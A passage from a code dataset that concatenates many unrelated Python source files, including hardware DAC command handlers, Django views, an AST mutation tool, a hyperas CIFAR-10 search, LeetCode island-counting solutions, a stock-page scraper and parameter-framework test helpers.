# def _calibration_init():
#     global calibration_var
#     """Routine that reads calibration data from the EEPROM."""
# _calibration_init()  # (commented-out call; original note was truncated)
#
def dac_voltage_set_handle(params):
    """Handle the 'dac set' command: validate (<channel>, <millivolts>) and
    forward it to the base board's voltage_set call.

    Valid ranges (mV): psu2/psu3 voltage channels 0-10000, base_board
    0-3300, every other channel 0-5000.
    """
    help_info = "dac set(<channel>,<value>)$\r\n\
    \t channel("+help_str+")\tvalue: (if ad5761: (0~10000) unit:mv,else :(0~5000) unit:mv) $\r\n"
    ''' help '''
    if Utility.is_ask_for_help(params) is True:
        return Utility.handle_done(help_info)
    ''' parameter analysis '''
    if len(params)!=2:
        return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"],\
                                                "param length error" )
    channel=params[0]
    if channel not in dac_list:
        return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"] ,\
                                             "channel parameter error" )
    # BUG FIX: a non-numeric value used to raise an uncaught ValueError;
    # report it as an invalid parameter instead.
    try:
        volt_value=float(params[1])
    except ValueError:
        return Utility.handle_error(Utility.handle_errorno['handle_errno_parameter_invalid'],\
                                            "param voltage value error " + str(params[1]))
    # Consolidated range table (the original duplicated the error branch).
    if channel=="psu3_voltage" or channel=="psu2_voltage":
        low, high = 0, 10000
    elif channel=="base_board":
        low, high = 0, 3300
    else:
        low, high = 0, 5000
    if volt_value<low or volt_value>high:
        return Utility.handle_error(Utility.handle_errorno['handle_errno_parameter_invalid'],\
                                            "param voltage value error" + str(volt_value))
    ret=Xavier.call("eval",test_base_board_name,"voltage_set",channel,volt_value)
    if ret==False:
        return Utility.handle_error(Utility.handle_errorno['handle_errno_execute_failure'],\
                                        "execute error")
    return Utility.handle_done()
def dac_5761_write_register_handle(params):
    """Handle the 'ad5761 register write' command: parse a hex register
    address and a 2-byte hex payload and forward them to the base board."""
    help_info = "ad5761 register write(<addr>,<data>)$\r\n\
    \t addr:register address $\r\n\
    \t data:2byte data\r\n"
    ''' help '''
    if Utility.is_ask_for_help(params) is True:
        return Utility.handle_done(help_info)
    ''' parameter analysis '''
    if len(params)!=2:
        return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"],\
                                                "param length error" )
    # BUG FIX: malformed hex used to raise an uncaught ValueError; report it
    # as an invalid parameter instead.
    try:
        addr=int(params[0],16)
        data=int(params[1],16)
    except ValueError:
        return Utility.handle_error(Utility.handle_errorno["handle_errno_parameter_invalid"],\
                                                "param hex format error" )
    ret=Xavier.call("eval",test_base_board_name,"ad5761_write_register",addr,data)
    if ret==False:
        return Utility.handle_error(Utility.handle_errorno['handle_errno_execute_failure'],\
                                        "execute error")
    return Utility.handle_done()
|
7,137 | 3344eb5b3e5b5eaee7b08d0991be732dae62c7fc | import io
from PIL import Image
def bytes_from_file(path, size, quality=15):
    """Load the image at *path*, resize it to *size* (a (width, height)
    tuple) and return it re-encoded as JPEG bytes.

    quality: JPEG quality; the low default trades fidelity for small output.
    """
    # BUG FIX: use the context manager so the underlying file handle is
    # closed even if resizing or encoding raises.
    with Image.open(path) as img:
        resized = img.resize(size)
        buffer = io.BytesIO()
        # NOTE(review): JPEG cannot encode RGBA/P sources; callers appear to
        # pass RGB images — confirm, or convert("RGB") before saving.
        resized.save(buffer, format="JPEG", quality=quality)
        return buffer.getvalue()
|
7,138 | 721e014bc5bf53a39556e31f281b77b90508cf12 | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# California Institute of Technology
# (C) 2008 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from vnf.components.ComputationResultRetriever import ComputationResultRetriever as base
class Retriever(base):
    """Fetches the phonon-DOS result of a finished 'mddoscalc' analysis job
    and stores it in a PhononDOS database record."""
    def _retrieveResultsFor(self, computation):
        # Progress milestones are reported via declareProgress as we go.
        director = self.director
        db = director.clerk.db
        orm = director.clerk.orm
        analysisObj = orm.record2object(computation)
        # must have a job
        self.declareProgress(0.1, 'look up job')
        job = computation.getJob(db)
        # check result is available
        self.declareProgress(0.2, 'check if results exist')
        self._check_results_sanity(expected_results=[analysisObj._dosFile], job=job)
        # create a dos record to save dos
        self.declareProgress(0.4, 'create a DOS data object to store the result')
        from vnf.dom.material_simulations.PhononDOS import PhononDOSTable
        dos = self._make_result_holder(computation, PhononDOSTable)
        #dos.matter = computation.matter #analysis calc does not have matter ref!
        db.updateRecord(dos)
        # save the result from job to dos
        #dosObj = orm.record2object(dos)
        #server = self.db.dereference(job.server)
        #is_available = self.dds.is_available
        #dosObj.read(analysisObj.dosFile)
        #from idf import DOS
        #DOS.write(dosObj.e, dosObj.i, 'data.idf')
        self.declareProgress(0.5, 'get result from server')
        # Copy 'data.idf' from the job's server into the dos record's store.
        #self._save_result(computation, job, analysisObj.dosFile, dos, 'data.txt')
        self._save_result(computation, job, 'data.idf', dos, 'data.idf')
def retriever():
    """Factory: build the result retriever for the 'mddoscalc' computation."""
    return Retriever('mddoscalc')
# version
__id__ = "$Id$"
# End of file
|
7,139 | 3d3b77630d275f830daf9f6e0d50a77ef624521e | # Midterm Review Class!
'''
This is a Multi line comment:
'''
# Break and Continue
# for i in range(10):
# if i == 5:
# continue
# print(i)
# Prints 0-4, 6-9
# # Structure
# Some MCQ
# Some T/F
# Some short answer
# # Lists
# Append
# remove
# del
# sort
# #Strings
# replace
# join
# split
# upper
# lower
# # Variables as conditions:
#
# a = 8
# if a:
# print("This evaluted to true")
# else:
# print("False")
#
# # General rule: Any variable that is either 0 or empty (empty string "" or []) will evaluate to false
# # Anything else will evaluate to true
# # Immutables vs. Mutables
# # Lists are mutable
#
# words = ["burrito", "pad thai", "hot dogs"]
# print(words)
# words[0] = "pizza"
# print(words)
#
# # Strings are not
#
# pet = "Mocha"
# print(pet)
# print(pet[1])
# # pet [1] = "a" # CANNOT DO THIS
# pet = pet.replace("o", "a")
# print(pet)
# Functions
# Write a function called countWords
# Count how many times a word appears in a list
# Input: list of strings, and a string to search for
# Output: an integer representing how many times the searched word was found
# def countWords(wordList, searchWord):
# counter = 0
# for word in wordList:
# if word == searchWord:
# counter += 1
#
# return counter
#
# # Now write a main function to use the countWords function to create a list of words and use countWords
# # to figure out how many times word is in wordList
#
# def main():
# vegetables = ["celery", "carrot", "celery", "spinach", "celery", "kale"]
# veggieWord1 = "celery"
#
# veggieCount1 = countWords(vegetables, veggieWord1)
# print(veggieWord1,"appears",veggieCount1,"times.")
#
#
#
# main()
# # Delimiters
# # Character that separates elements
# msg = "hi, brandon, is, not, feeling, well"
# wordList = msg.split(",")
# for item in wordList:
# print(item, end="")
# print()
# print(wordList)
#
# newMsg = " ".join(wordList)
# print(newMsg)
# File Reading/Writing
# def main():
# fileIn = open("cities.txt", "r")
# for line in fileIn:
# line = line.strip()
# print(line)
#
#
# main()
# Print the multiples of ten from 10 through 100, one per line.
for value in range(10, 110, 10):
    print(value)
|
7,140 | d5f66d92371838c703abbf80e2b78717cdd4a4fb | from django.shortcuts import render
from django.http import HttpResponse
# from appTwo.models import User
from appTwo.forms import NewUserForm
# Create your views here.
# def index(request):
# return HttpResponse("<em>My Second Project</em>")
def welcome(request):
    """Render the static landing page."""
    return render(request, 'welcome.html')
def users(request):
    """Show the new-user form; on a valid POST, save it and fall back to
    the welcome view, otherwise re-render the bound form with its errors."""
    form = NewUserForm()
    if request.method == "POST":
        form = NewUserForm(request.POST)
        if form.is_valid():
            form.save(commit=True)
            return welcome(request)
        print('ERROR FORM INVALID')
    return render(request, "users.html", {'form': form})
|
7,141 | c0524301a79788aa34a039fc46799021fb45362c | import random
from common.ast import *
from mutate.mutate_ctrl import *
def _check_parent_type(node, nodes, types):
par = node
while(nodes[par] != None):
par = nodes[par]
if type(par) in types:
return True
return False
def mutate_operator(root, nodes, path):
    """Swap one randomly chosen operator node for a different operator of
    the same family, save the mutated AST to *path*, and return the mutated
    line number (-1 when no eligible operator exists)."""
    eligible = [n for n in nodes.keys()
                if type(n) in OP_TYPES.keys()
                and _check_parent_type(n, nodes, OP_PARENT_TYPES)]
    if not eligible:
        return -1
    target = random.choice(eligible)
    family = OP_TYPES[type(target)]
    # Pick any operator class in the same family other than the current one.
    replacement = random.choice([cls for cls in OP_MAP[family] if cls != type(target)])
    target.__class__ = replacement
    save_ast(root, path)
    return target.lineno
def mutate_signal(root, nodes, path):
    """Replace one randomly chosen Identifier with another signal of the
    same type, save the mutated AST to *path*, and return the mutated line
    number.

    Returns -1 when no eligible identifier exists.  NOTE(review): if 1000
    swap attempts are exhausted the loop falls through and returns None —
    probably intended to be -1 as well.
    """
    candidates = [node
                    for node in nodes.keys()
                    if type(node) == Identifier
                    and _check_parent_type(node, nodes, SIG_PARENT_TYPES)]
    if len(candidates) == 0:
        return -1
    sigs = get_signals(root)
    trial = 0
    while (trial < 1000):
        trial += 1
        mut_node = random.choice(candidates)
        name = mut_node.name
        if name in sigs.keys():
            # NOTE(review): sigs appears to be dual-keyed — name -> type and
            # type -> list of names of that type; confirm in get_signals.
            sig_type = sigs[name]
            choices = [sig for sig in sigs[sig_type] if sig != name]
            if len(choices) == 0:
                # No other signal of this type; try a different candidate.
                continue
            new_name = random.choice(choices)
            mut_node.name = new_name
            save_ast(root, path)
            return mut_node.lineno
def mutate_constant(root, nodes, path):
    """Constant mutation is not implemented; always reports -1 (no change)."""
    return -1
def mutate_operand(root, nodes, path):
    """Operand mutation is not implemented; always reports -1 (no change)."""
    return -1
|
7,142 | 0ae626df5a471af77f7361bb765b46b861ee8a2c | # terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
    """Terrascript provider stub for Spotinst; all behaviour is inherited."""
7,143 | cc097b4d2a5a521a0adb83ca1b58470b4ce84f39 | '''
Copyright
Jelen forrรกskรณd a Budapesti Mลฑszaki รฉs Gazdasรกgtudomรกnyi Egyetemen tartott
"Deep Learning a gyakorlatban Python รฉs LUA alapon" tantรกrgy segรฉdanyagakรฉnt kรฉszรผlt.
A tantรกrgy honlapja: http://smartlab.tmit.bme.hu/oktatas-deep-learning
Deep Learning kutatรกs: http://smartlab.tmit.bme.hu/deep-learning
A forrรกskรณdot GPLv3 licensz vรฉdi. รjrafelhasznรกlรกs esetรฉn lehetลsรฉg szerint kรฉrjรผk
az alรกbbi szerzลt รฉrtesรญteni.
2018 (c) Csapรณ Tamรกs Gรกbor (csapot kukac tmit pont bme pont hu),
Gyires-Tรณth Bรกlint, Zainkรณ Csaba
Links:
[hyperas] https://github.com/maxpumperla/hyperas
'''
# !pip3 install hyperas
# based on https://github.com/keras-team/keras/blob/master/examples/cifar10_cnn.py
import hyperas
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.callbacks import EarlyStopping, CSVLogger
import numpy as np
# do not use all GPU memory
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
set_session(tf.Session(config=config))
from keras.datasets import cifar10
# hiperparamรฉter optimalizรกlรกs hyperas-sal (https://github.com/maxpumperla/hyperas)
# a hyperas-nak kell kรฉt fรผggvรฉny:
# -- data() : adatok betรถltรฉse
# -- create_model() : hรกlรณzat modell
def data():
    """Load CIFAR-10 and return flattened, normalised train/test splits.

    Returns (x_train, y_train, x_test, y_test) with pixels scaled to [0, 1],
    images flattened to 3072-vectors (32x32x3) and labels one-hot encoded.
    hyperas calls this once to obtain the data for every trial.
    """
    (x_train, y_train), (x_test, y_test) = cifar10.load_data()
    num_classes = 10
    # Convert class vectors to binary class matrices.
    y_train = keras.utils.to_categorical(y_train, num_classes)
    y_test = keras.utils.to_categorical(y_test, num_classes)
    # reshape for FC-DNN
    x_train = np.reshape(x_train,(50000,3072)) # 32x32x3
    x_test = np.reshape(x_test,(10000,3072))
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    # Normalization of pixel values (to [0-1] range)
    x_train /= 255
    x_test /= 255
    return x_train, y_train, x_test, y_test
def create_model(x_train, y_train, x_test, y_test):
    """Hyperas search template: build/train one MLP sampled from the search
    space and report its best validation accuracy.

    The {{choice(...)}} / {{uniform(...)}} markers are hyperas template
    placeholders, not plain Python; hyperas rewrites this function's source
    for each trial, so its structure must not be refactored.
    """
    n_layer1 = {{choice([128, 256, 512])}}
    n_layer2 = {{choice([128, 256, 512])}}
    dropout_1 = {{uniform(0, 1)}}
    dropout_2 = {{uniform(0, 1)}}
    optim = {{choice(['rmsprop', 'adam', 'sgd'])}}
    n_batch = {{choice([64, 128, 256])}}
    print('Model hyperparameters: ', n_layer1, n_layer2, dropout_1, dropout_2, optim, n_batch)
    # 3 x 3 x [0-1]x[0-1] x 3 x 3 = roughly 8100 combinations
    model = Sequential()
    model.add(Dense(n_layer1, activation='relu', input_dim=3072))
    model.add(Dropout(dropout_1))
    model.add(Dense(n_layer2, activation='relu'))
    model.add(Dropout(dropout_2))
    model.add(Dense(10, activation='softmax'))
    model.compile(optimizer=optim,
                  loss='categorical_crossentropy',
                  metrics=['accuracy'])
    import datetime
    # Encode the run timestamp and hyperparameters into the CSV log name so
    # each trial's training curve can be told apart afterwards.
    current_date = '{date:%Y-%m-%d_%H-%M-%S}'.format(date=datetime.datetime.now())
    print(current_date)
    csv_name = '13_hyperas_cifar10_' + current_date + '_' + \
        str(n_layer1) + '_' + str(n_layer2) + '_' + \
        str(dropout_1) + '_' + str(dropout_2) + '_' + \
        str(optim) + '_' + str(n_batch) + '.csv'
    callbacks = [EarlyStopping(monitor='val_loss', patience=3, verbose=0), \
                 CSVLogger(csv_name, append=True, separator=';')]
    result = model.fit(x_train, y_train,
                       batch_size=n_batch,
                       epochs=100,
                       verbose=2,
                       validation_data=(x_test, y_test),
                       callbacks=callbacks,
                       shuffle=True)
    validation_acc = np.amax(result.history['val_acc'])
    print('Best validation acc of epoch:', validation_acc)
    # hyperopt minimises, so return the negated best validation accuracy.
    return {'loss': -validation_acc, 'status': STATUS_OK, 'model': model}
from hyperopt import Trials, STATUS_OK, tpe
from hyperas import optim
from hyperas.distributions import choice, uniform
# main hyperopt part
# the search algorithm can be:
# -- random.suggest -> random search
# -- tpe.suggest -> Tree-structured Parzen Estimator
best_run, best_model = optim.minimize(model=create_model,
                                      data=data,
                                      algo=tpe.suggest,
                                      max_evals=5,
                                      trials=Trials())
# Re-load the data to evaluate the winning model on the test split.
x_train, y_train, x_test, y_test = data()
print("Evalutation of best performing model:")
print(best_model.evaluate(x_test, y_test))
print("Best performing model chosen hyper-parameters:")
print(best_run)
|
7,144 | 899cdb5cbdbd0a57af76a5044d54e1fe2a497847 | '''
Created on Jan 19, 2014
@author: felix
'''
import sys
from PyPDF2 import PdfFileReader
from pytagcloud import create_tag_image, make_tags, LAYOUT_HORIZONTAL
from pytagcloud.lang.counter import get_tag_counts
def main():
    """Build a word-cloud PNG from the PDF named after a '-f' argument.

    Scans argv for '-f' and treats the following token as the input path;
    any extraction failure is reported as a usage error.
    """
    for i in range(0, len(sys.argv)):
        if (sys.argv[i] == '-f'):
            try:
                content = getPDFContent(sys.argv[i+1])
            except:
                raise RuntimeError('Something went wrong! Usage: makeCloudFromPdf -f inputfile.pdf')
            # Keep the 99 most frequent tags (index 0 is skipped) and render
            # them horizontally onto a 1080p canvas.
            tags = make_tags(get_tag_counts(content)[1:100], maxsize=100)
            create_tag_image(tags, 'cloud_large2.png', size=(1920, 1080), background=(0, 0, 0, 255), layout=LAYOUT_HORIZONTAL, fontname='Vollkorn')
def getPDFContent(path):
content = ""
p = file(path, "rb")
pdf = PdfFileReader(p)
numPages = pdf.getNumPages()
print 'pages:', numPages
for i in range(0, numPages-1):
try:
content += pdf.getPage(i).extractText() + "\n"
except:
content += ""
#content = " ".join(content.replace(u"\xa0", " ").strip().split())
return content
if __name__ == "__main__":
main() |
7,145 | eb3a32c17d8e5e9f717e813d5612d077c8feac48 | import sys
import time
from cli.utils import get_container_runtime, get_containers, run_shell_cmd
runtime = get_container_runtime()
def rm(ids):
    """Remove the given container ids, echoing the command being run."""
    command = '{} rm {}'.format(runtime, ' '.join(ids))
    sys.stdout.write(command + '\n')
    run_shell_cmd(command)
def stop(ids):
    """Stop the given container ids, echoing the command being run."""
    command = '{} stop {}'.format(runtime, ' '.join(ids))
    sys.stdout.write(command + '\n')
    run_shell_cmd(command)
def undeploy_containers():
    """Stop every running container, wait for shutdown, then remove all."""
    running_ids = [c.id for _, c in get_containers().items() if c.up]
    if running_ids:
        stop(running_ids)
        time.sleep(5)  # give the runtime time to finish stopping
    # Re-query so containers that just stopped are included in the removal.
    remaining = [c.id for _, c in get_containers().items()]
    if remaining:
        rm(remaining)
if __name__ == '__main__':
undeploy_containers() |
7,146 | de24b341102f5979cc48b22c3a07d42915b6dd18 | from .tokening import sign_profile_tokens, validate_token_record, \
get_profile_from_tokens
from .zone_file import create_zone_file
from .legacy import is_profile_legacy_format, get_person_from_legacy_format
|
7,147 | b46f19708e9e2a1be2bbd001ca6341ee7468a60d | #!/usr/bin/env python
# coding:utf-8
"""
200. ๅฒๅฑฟๆฐ้
้พๅบฆ
ไธญ็ญ
็ปๅฎไธไธช็ฑ '1'๏ผ้ๅฐ๏ผๅ '0'๏ผๆฐด๏ผ็ปๆ็็ไบ็ปด็ฝๆ ผ๏ผ่ฎก็ฎๅฒๅฑฟ็ๆฐ้ใไธไธชๅฒ่ขซๆฐดๅ
ๅด๏ผๅนถไธๅฎๆฏ้่ฟๆฐดๅนณๆนๅๆๅ็ดๆนๅไธ็ธ้ป็้ๅฐ่ฟๆฅ่ๆ็ใไฝ ๅฏไปฅๅ่ฎพ็ฝๆ ผ็ๅไธช่พนๅ่ขซๆฐดๅ
ๅดใ
็คบไพ 1:
่พๅ
ฅ:
11110
11010
11000
00000
่พๅบ: 1
็คบไพ 2:
่พๅ
ฅ:
11000
11000
00100
00011
่พๅบ: 3
"""
# ================================================================================
"""
ๆดชๆฐดๅกซๅ
็ฎๆณ(Flood Fill Algorithm)
"""
"""
Flood Fill ็ฎๆณ
ๆฏไปไธไธชๅบๅไธญๆๅ่ฅๅนฒไธช่ฟ้็็นไธๅ
ถไป็ธ้ปๅบๅๅบๅๅผ๏ผๆๅๅซๆๆไธๅ้ข่ฒ๏ผ็็ปๅ
ธ็ฎๆณใ
ๅ ไธบๅ
ถๆ่ทฏ็ฑปไผผๆดชๆฐดไปไธไธชๅบๅๆฉๆฃๅฐๆๆ่ฝๅฐ่พพ็ๅบๅ่ๅพๅใ
ไปไธไธช็นๆฉๆฃๅผ๏ผๆพๅฐไธๅ
ถ่ฟ้็็น๏ผ่ฟไธๆฏไปไน้ซๆทฑ็็ฎๆณ๏ผ
ๅ
ถๅฎๅฐฑๆฏไปไธไธช็นๅผๅง๏ผ่ฟ่กไธๆฌกโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโ๏ผ
้่ฟโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโๅ็ฐไธ็่ฟ็็ๅบๅ๏ผ
ๅฏนไบ่ฟ้้ขๆฅ่ฏด๏ผ
ๅฐฑๆฏไปไธไธชๆฏโ้ๅฐโ็ๆ ผๅญๅผๅง่ฟ่กไธๆฌกโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโ๏ผ
ๆไธไน็ธ่ฟ็ๆๆ็ๆ ผๅญ้ฝๆ ่ฎฐไธ๏ผ่งไธบๅ็ฐไบไธไธชโๅฒๅฑฟโใ
่ฏดๆ๏ผ
้ฃไนๆฏไธๆฌก่ฟ่กโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโ็ๆกไปถๅฐฑๆฏ๏ผ
1ใ่ฟไธชๆ ผๅญๆฏ้ๅฐ๏ผโ1โ๏ผ๏ผๅฆๆๆฏๆฐดๅ๏ผโ0โ๏ผๅฐฑๆ ไป่ฐ่ฎบโๅฒๅฑฟโ๏ผ
2ใ่ฟไธชๆ ผๅญไธ่ฝๆฏไนๅๅ็ฐโๅฒๅฑฟโ็่ฟ็จไธญๆง่กไบโๆทฑๅบฆไผๅ
้ๅโๆ่
โๅนฟๅบฆไผๅ
้ๅโๆไฝ๏ผ่่ขซๆ ่ฎฐ็ๆ ผๅญใ
"""
# ================================================================================
"""
ๆ่ทฏ:
DFS(ๆทฑๅบฆไผๅ
้ๅ)
(ๅๆบฏ)
ๆถ้ดๅคๆๅบฆ:
O()
็ฉบ้ดๅคๆๅบฆ:
O()
"""
class Solution(object):
    """Count islands in a '1'/'0' grid via recursive depth-first search."""

    # Offsets for the four orthogonal neighbours: up, right, down, left.
    directions = [(-1, 0), (0, 1), (1, 0), (0, -1)]

    def dfs(self, matrix, i, j, m, n, visited):
        """Flood-fill from (i, j), marking every reachable land cell visited."""
        visited[i][j] = True
        for di, dj in self.directions:
            ni, nj = i + di, j + dj
            # Recurse only into in-bounds, unvisited land cells.
            if 0 <= ni < m and 0 <= nj < n and not visited[ni][nj] and matrix[ni][nj] == '1':
                self.dfs(matrix, ni, nj, m, n, visited)

    def numIslands(self, grid):
        """Return the number of 4-connected islands of '1' cells in *grid*."""
        if len(grid) == 0:
            return 0
        rows, cols = len(grid), len(grid[0])
        seen = [[False] * cols for _ in range(rows)]
        islands = 0
        for r in range(rows):
            for c in range(cols):
                # Each unvisited land cell starts a brand-new island.
                if grid[r][c] == '1' and not seen[r][c]:
                    self.dfs(grid, r, c, rows, cols, seen)
                    islands += 1
        return islands
# ================================================================================
"""
ๆ่ทฏ:
BFS(ๅนฟๅบฆไผๅ
้ๅ)
(้่ฆไธไธช่พ
ๅฉ้ๅ)
ๆถ้ดๅคๆๅบฆ:
O()
็ฉบ้ดๅคๆๅบฆ:
O()
"""
class Solution(object):
    """Count islands in a grid of '1' (land) / '0' (water) cells via BFS flood fill."""

    # (row, col) offsets of the 4 neighbours: up, right, down, left.
    # The visiting order of the directions does not affect the result.
    directions = [(-1, 0), (0, 1), (1, 0), (0, -1)]

    def numIslands(self, grid):
        """Return the number of islands (4-connected groups of '1') in grid.

        :type grid: List[List[str]]
        :rtype: int
        """
        from collections import deque

        # Guard both the empty grid and a grid whose rows are empty.
        if not grid or not grid[0]:
            return 0
        m, n = len(grid), len(grid[0])
        island_count = 0
        visited = [[False] * n for _ in range(m)]
        queue = deque()
        for i in range(m):
            for j in range(n):
                # Every unvisited land cell seeds exactly one new island.
                if grid[i][j] == '1' and not visited[i][j]:
                    island_count += 1
                    visited[i][j] = True
                    queue.append((i, j))
                    # BFS: mark every land cell connected to the seed.
                    while queue:
                        x, y = queue.popleft()
                        for dx, dy in self.directions:
                            nx, ny = x + dx, y + dy
                            # Enqueue only in-grid, unvisited land neighbours,
                            # marking them on enqueue so no cell enters twice.
                            if 0 <= nx < m and 0 <= ny < n \
                                    and not visited[nx][ny] and grid[nx][ny] == '1':
                                visited[nx][ny] = True
                                queue.append((nx, ny))
        return island_count
# ================================================================================
# ================================================================================
# ================================================================================
# ================================================================================
# Demo: count the islands in a small sample grid ('1' = land, '0' = water)
# and print the result; all land cells here are 4-connected, so one island.
gggg = [
    list("11110"),
    list("11010"),
    list("11000"),
    list("00000"),
]
solution = Solution()
result = solution.numIslands(gggg)
print(result)
|
7,148 | f1e335d0187aeb78d857bc523eb33221fd2e7e6d |
def most_expensive_item(products):
    """Return the key of the *products* mapping whose value is largest.

    Ties are broken in favour of the first-encountered (insertion-order)
    maximum; an empty mapping raises ValueError.
    """
    return max(products, key=products.get)
|
7,149 | e2671911894871c32ad933fde8e05c913a4cc942 | from django.urls import path
from . import views
# NOTE(review): propertyForRent / propertyForSale are imported but the routes
# below call them through the `views` module; only PropertyDetailView is used
# directly from this import.
from .views import propertyForRent, propertyForSale, PropertyDetailView

# URL namespace for reversing, e.g. reverse("core:home").
app_name = "core"

# Routes of the core app.
urlpatterns = [
    path("", views.index, name="home"),
    path("property_for_rent/", views.propertyForRent, name="property_rent"),
    path("property_for_sale/", views.propertyForSale, name="property_sale"),
    # NOTE(review): unlike its siblings this route has no trailing slash —
    # confirm that is intentional (APPEND_SLASH behaviour).
    path("property/<int:pk>", PropertyDetailView.as_view(), name="property_detail"),
    path("contact/", views.contact, name="contact"),
]
|
7,150 | 09ea684cfb6f0a521d3bdadf977d9385636bdc83 | from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
# NOTE(review): `settings` and `static` are imported but unused in this
# excerpt — possibly intended for appending media-file routes; confirm.
from . import views

# Blog routes: post index, post detail by slug, and tag listing by slug.
urlpatterns = [
    path('', views.PostList.as_view(), name='blog_index'),
    path('<slug:slug>/', views.post_detail, name='post_detail'),
    path('tag/<slug:slug>/', views.TagIndexView.as_view(), name='tag')
]
|
7,151 | 81f75498afcca31e38ea7856c81c291af3ef6673 | import urllib2
import csv
from bs4 import BeautifulSoup
# Pages to inspect; keys are display labels, values are page URLs.
# Commented-out entries can be re-enabled as needed.
url = {
    "Home ": 'https://www.moneycontrol.com/',
    # "Market": 'https://www.moneycontrol.com/stocksmarketsindia/',
    # "Mf Home": 'https://www.moneycontrol.com/mutualfundindia/'
}
def get_last_element_timestamp(url):
    """Fetch *url* and return the text of the last <div> element on the page."""
    response = urllib2.urlopen(url)
    page = BeautifulSoup(response.read(), "lxml")
    return page.find_all('div')[-1].text
def historic_data(url):
    """Download a CSV from *url* and return its final row as a list of strings."""
    response = urllib2.urlopen(url)
    rows = list(csv.reader(response, delimiter=','))
    return rows[-1]
# Print the text of the last <div> of each configured page.
for page,url_value in url.items():
    print (page,get_last_element_timestamp(url_value))
    # print page
##
# Historical-data CSV endpoints: IT sector on BSE/NSE plus the two indices.
bse_info_csv="http://www.moneycontrol.com/tech_charts/bse/his/it.csv"
nse_info_csv = "http://www.moneycontrol.com/tech_charts/nse/his/it.csv"
historic_sensex = "http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv"
historic_nifty = "http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv"
# Print the most recent (last) row of each CSV.
print("Historic csv infosys => BSE")
print(historic_data(bse_info_csv))
print ("Historic csv of infosys => NSE")
print(historic_data(nse_info_csv))
print ("Historic csv of sensex ")
print(historic_data(historic_sensex))
print ("Historic csv of nifty")
print (historic_data(historic_nifty))
|
7,152 | 3c2873add66172a5ed038949c31d514dcd5f26b3 | # -*-coding:utf-8 -*
# Copyright (c) 2011-2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import subprocess
import unittest
import time
class RemoteCli(object):
    """Thin wrapper that sends commands to a remote-process TCP endpoint.

    Subclasses must set `self.platform_command` to the shell command prefix
    (e.g. "remote-process localhost 5000 ").
    """
    def sendCmd(self, cmd, *args):
        """Run `platform_command cmd args...` through the shell.

        Returns (stdout, stderr); stdout is stripped of surrounding
        whitespace. NOTE(review): `args` comes from *args and is never None,
        so the guard below always passes and an argument-less call still
        appends a trailing space.
        """
        shell_cmd = " ".join([self.platform_command, cmd])
        if args is not None:
            shell_cmd += " " + " ".join(args)
        print "CMD :",
        print "[" + shell_cmd + "]"
        try:
            p = subprocess.Popen(shell_cmd, shell=True, stdout=subprocess.PIPE)
        except Exception as (errno, strerror):
            # Report the failure through the return value, not an exception.
            return None, strerror
        out, err = p.communicate()
        if out is not None:
            out = out.strip()
        return out, err
class Pfw(RemoteCli):
    """Command proxy for the parameter-framework process (localhost:5000)."""
    def __init__(self):
        self.platform_command = "remote-process localhost 5000 "
class Hal(RemoteCli):
    """Command proxy for the test-platform (HAL) process (localhost:5001)."""
    def __init__(self):
        self.platform_command = "remote-process localhost 5001 "

    # Starts the HAL exe
    def startHal(self):
        """Launch the test-platform binary in the background (non-blocking)."""
        cmd= "test-platform $PFW_TEST_CONFIGURATION"
        subprocess.Popen(cmd, shell=True)
        pass

    # Send command "stop" to the HAL
    def stopHal(self):
        """Ask the running test-platform process to exit."""
        subprocess.call("remote-process localhost 5001 exit", shell=True)

    def createInclusiveCriterion(self, name, nb):
        """Declare an inclusive selection criterion (nb is passed as a string)."""
